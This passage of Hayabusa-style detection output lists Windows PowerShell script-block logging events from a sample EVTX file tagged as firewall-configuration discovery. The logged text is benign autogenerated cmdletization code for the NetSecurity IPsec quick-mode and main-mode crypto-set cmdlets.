$__cmdletization_values, 
$false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 
'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecQuickModeCryptoSet ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.020 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] 
${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] 
${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder =",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System 
Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.020 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) 
$__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 
'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] 
